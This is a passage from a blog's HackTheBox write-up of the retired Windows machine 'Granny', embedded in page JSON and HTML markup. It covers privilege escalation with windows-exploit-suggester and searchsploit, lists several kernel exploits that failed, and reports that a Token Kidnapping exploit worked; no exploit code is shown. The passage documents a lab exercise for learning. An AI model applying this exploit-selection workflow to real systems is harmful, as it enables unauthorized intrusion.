0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Internal Enumeration</h2>\n<p>Let’s move on to privilege escalation.</p>\n<p>I ran <code class=\"language-text\">windows-exploit-suggester</code> as usual.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">rm</span> ./*.xls\npython windows-exploit-suggester.py --update\n<span class=\"token function\">ls</span> ./*.xls <span class=\"token operator\">|</span> <span class=\"token punctuation\">(</span>read d<span class=\"token punctuation\">;</span> python windows-exploit-suggester.py --systeminfo systeminfo.txt --database <span class=\"token variable\">$d</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>A lot of results came back. Plenty to choose from.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/84727d7d389f34e5c7377769a0ff0da0/6acbf/image-20220724221450276.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABc0lEQVQozz1SVxbDIAzjSH0ZZWQSRlbT+9/GtUyTDz8PjBCylU2BQvA0zxN5P7MVP02j1OFxNgy91LvOibfW0Pv9Fnu9Xo8pPeHSQOM4CNiyFDAYLiIHmNaanLMM0JIxmtq2pbquqWlq8VVViVfGR5rGAggmN5vpnwOw77uHIXLUQWJZ/PMr9KCuTPKU+NtoDHGRb/qlNCG+L6FZzjiGH6fhqQPcGEMdgyp3LvT9nrSuifZ9pfPcKHOM/LoO2rYs9ePYaNuz1D+fQ0ignnKURwEcYyBlN8/NqzSgOedAkWPkAAGLzJfQXHwhAI0Rw0O/pmlYw4pU9wnCJOfEDFZ+NZd4S8x2F+CbMRjBAxCs4n9DMCyty8SV2z2dzAT6ZWEYBQSv3wzxbdRxDq1RB2DReJaJY/oAVXaNz8vQT7RiAMhwXUXb28C4aHvKg+ufAHbTOSeboLQbZaJYm7KPvawAtEFcJqhlkXEBfTjH95DDkFtrJf4BymNew/2QmwwAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/84727d7d389f34e5c7377769a0ff0da0/8ac56/image-20220724221450276.webp 240w,\n/static/84727d7d389f34e5c7377769a0ff0da0/d3be9/image-20220724221450276.webp 480w,\n/static/84727d7d389f34e5c7377769a0ff0da0/e46b2/image-20220724221450276.webp 960w,\n/static/84727d7d389f34e5c7377769a0ff0da0/4ad2e/image-20220724221450276.webp 1001w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/84727d7d389f34e5c7377769a0ff0da0/8ff5a/image-20220724221450276.png 240w,\n/static/84727d7d389f34e5c7377769a0ff0da0/e85cb/image-20220724221450276.png 480w,\n/static/84727d7d389f34e5c7377769a0ff0da0/d9199/image-20220724221450276.png 960w,\n/static/84727d7d389f34e5c7377769a0ff0da0/6acbf/image-20220724221450276.png 1001w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/84727d7d389f34e5c7377769a0ff0da0/d9199/image-20220724221450276.png\"\n            alt=\"image-20220724221450276\"\n            title=\"image-20220724221450276\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I tried several of them:</p>\n<ul>\n<li>\n<p>NG (did not work):</p>\n<ul>\n<li><a href=\"https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-010\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">MS15-010</a></li>\n<li><a href=\"https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-002\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">MS14-002</a></li>\n<li><a href=\"https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-058\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">MS14-058</a></li>\n<li><a href=\"https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-070\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">MS14-070</a></li>\n<li><a href=\"https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS13-053\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">MS13-053.exe</a></li>\n<li>Appeared to succeed, but likely spawned a terminal in a separate process</li>\n<li><a href=\"https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS11-011\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">MS11-011</a></li>\n<li><a href=\"https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-040\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">MS14-40</a></li>\n</ul>\n</li>\n</ul>\n<p>Since those did not work, I also tried searchsploit.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ searchsploit Microsoft Windows Server <span class=\"token number\">2003</span>\n----------------------------------------------------------------------------------------------- ---------------------------------\n Exploit Title                                                                                 <span class=\"token operator\">|</span>  Path\n----------------------------------------------------------------------------------------------- ---------------------------------\nMicrosoft Exchange Server <span class=\"token number\">2000</span>/2003 - Outlook Web Access Script Injection                      <span class=\"token operator\">|</span> windows/remote/28005.pl\nMicrosoft Outlook Web Access <span class=\"token keyword\">for</span> Exchange Server <span class=\"token number\">2003</span> - <span class=\"token string\">'redir.asp'</span> Open Redirection           <span class=\"token operator\">|</span> windows/remote/32489.txt\nMicrosoft Outlook Web Access <span class=\"token keyword\">for</span> Exchange Server <span class=\"token number\">2003</span> - Cross-Site Request Forgery             <span class=\"token operator\">|</span> windows/dos/34359.html\nMicrosoft Windows Server <span class=\"token number\">2000</span> <span class=\"token operator\">&lt;</span> <span class=\"token number\">2008</span> - Embedded OpenType Font Engine Remote Code Execution <span class=\"token punctuation\">(</span>MS <span class=\"token operator\">|</span> windows/dos/10068.rb\nMicrosoft Windows Server <span class=\"token number\">2000</span>/2003 - Code Execution <span class=\"token punctuation\">(</span>MS08-067<span class=\"token punctuation\">)</span>                                 <span class=\"token operator\">|</span> windows/remote/7132.py\nMicrosoft Windows Server <span class=\"token number\">2000</span>/2003 - Recursive DNS Spoofing <span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span>                                <span class=\"token operator\">|</span> windows/remote/30635.pl\nMicrosoft Windows Server <span class=\"token number\">2000</span>/2003 - Recursive DNS Spoofing <span class=\"token punctuation\">(</span><span class=\"token number\">2</span><span class=\"token punctuation\">)</span>                                <span class=\"token operator\">|</span> windows/remote/30636.pl\nMicrosoft Windows Server <span class=\"token number\">2003</span> - <span class=\"token string\">'.EOT'</span> Blue Screen of Death Crash                              <span class=\"token operator\">|</span> windows/dos/9417.txt\nMicrosoft Windows Server <span class=\"token number\">2003</span> - AD BROWSER ELECTION Remote Heap Overflow                       <span class=\"token operator\">|</span> windows/dos/16166.py\nMicrosoft Windows Server <span class=\"token number\">2003</span> - NetpIsRemote<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> Remote Overflow <span class=\"token punctuation\">(</span>MS06-040<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">(</span>Metasploit<span class=\"token punctuation\">)</span>         <span class=\"token operator\">|</span> windows/remote/2355.pm\nMicrosoft Windows Server <span class=\"token number\">2003</span> - Token Kidnapping Local Privilege Escalation                    <span class=\"token operator\">|</span> windows/local/6705.txt\nMicrosoft Windows Server <span class=\"token number\">2003</span> SP2 - Local Privilege Escalation <span class=\"token punctuation\">(</span>MS14-070<span class=\"token punctuation\">)</span>                      <span class=\"token operator\">|</span> windows/local/35936.py\nMicrosoft Windows Server <span class=\"token number\">2003</span> SP2 - TCP/IP IOCTL Privilege Escalation <span class=\"token punctuation\">(</span>MS14-070<span class=\"token punctuation\">)</span>               <span class=\"token operator\">|</span> windows/local/37755.c\n----------------------------------------------------------------------------------------------- ---------------------------------\nShellcodes: No Results</code></pre></div>\n<p>In the end, everything failed except <code class=\"language-text\">Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation | windows/local/6705.txt</code>.</p>\n<p>Mysterious…</p>\n<p>Still, the exploit landed and I was able to retrieve the flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 602px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/93b7bbee05aea2bef7d3c69694574515/32056/image-20220724235626601.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 50.83333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABkUlEQVQoz41S2W7cMAz0t+Qh69uS17Zs+ZaPXXvdotv0pf//IROKQQIE2RR9GJCiKHJmIOfJFTDrAdUY1P2Kc9nhOUiRFx1+v/zFfrtj2+8w0462m3Hdf+HHzz/YKdr6vNxQ5A2ePYmzHuC4YQQ9zmjMDWa7o51vqPoLQxYFlmXGvl2xES6XFSvhOHbOt+2CdV2oZ6KFBsM0wonTFO1goGuNru8YCzVleU4sM4RhiCDwEUUhIaI84Npb3eYB3yVxzDUnp4fj0EHrEqXK0TQabVtDVyXVKihVIMvOqOg8EYOmqSGkQFHQwjxjpESqLAskSQxHa42BBvbEbBwHjGbANBs6tyxlHHteYHvmmQaSEt/3H8LzPDieFyBOEpJI22irTCXSc8pbpZQsI44jjvaRZeH7HlzXfQhHKYXtupCcgWVZ6TZWlaKh8lOzZfAev4Pzrt/6JIQgVgKJSCAJrnv65+OHA0P6NmWp2LO6rjg/jo2ln05f2Xwn9UOy9VAQmzfPBH8NTYNDiiyP/GLTPf+/JL8Cm0tBCWqxDjoAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/93b7bbee05aea2bef7d3c69694574515/8ac56/image-20220724235626601.webp 240w,\n/static/93b7bbee05aea2bef7d3c69694574515/d3be9/image-20220724235626601.webp 480w,\n/static/93b7bbee05aea2bef7d3c69694574515/ff4b8/image-20220724235626601.webp 602w\"\n              sizes=\"(max-width: 602px) 100vw, 602px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/93b7bbee05aea2bef7d3c69694574515/8ff5a/image-20220724235626601.png 240w,\n/static/93b7bbee05aea2bef7d3c69694574515/e85cb/image-20220724235626601.png 480w,\n/static/93b7bbee05aea2bef7d3c69694574515/32056/image-20220724235626601.png 602w\"\n            sizes=\"(max-width: 602px) 100vw, 602px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/93b7bbee05aea2bef7d3c69694574515/32056/image-20220724235626601.png\"\n            alt=\"image-20220724235626601\"\n            title=\"image-20220724235626601\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>That was exhausting.</p>","fields":{"slug":"/hackthebox-windows-granny.-en","tagSlugs":["/tag/hack-the-box-en/","/tag/windows-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2022-07-24","description":"A writeup of the retired HackTheBox machine 'Granny'.","tags":["HackTheBox (en)","Windows (en)","EasyBox (en)","English"],"title":"HackTheBox Writeup: Granny (Easy/Windows)","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/hackthebox-windows-granny.-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}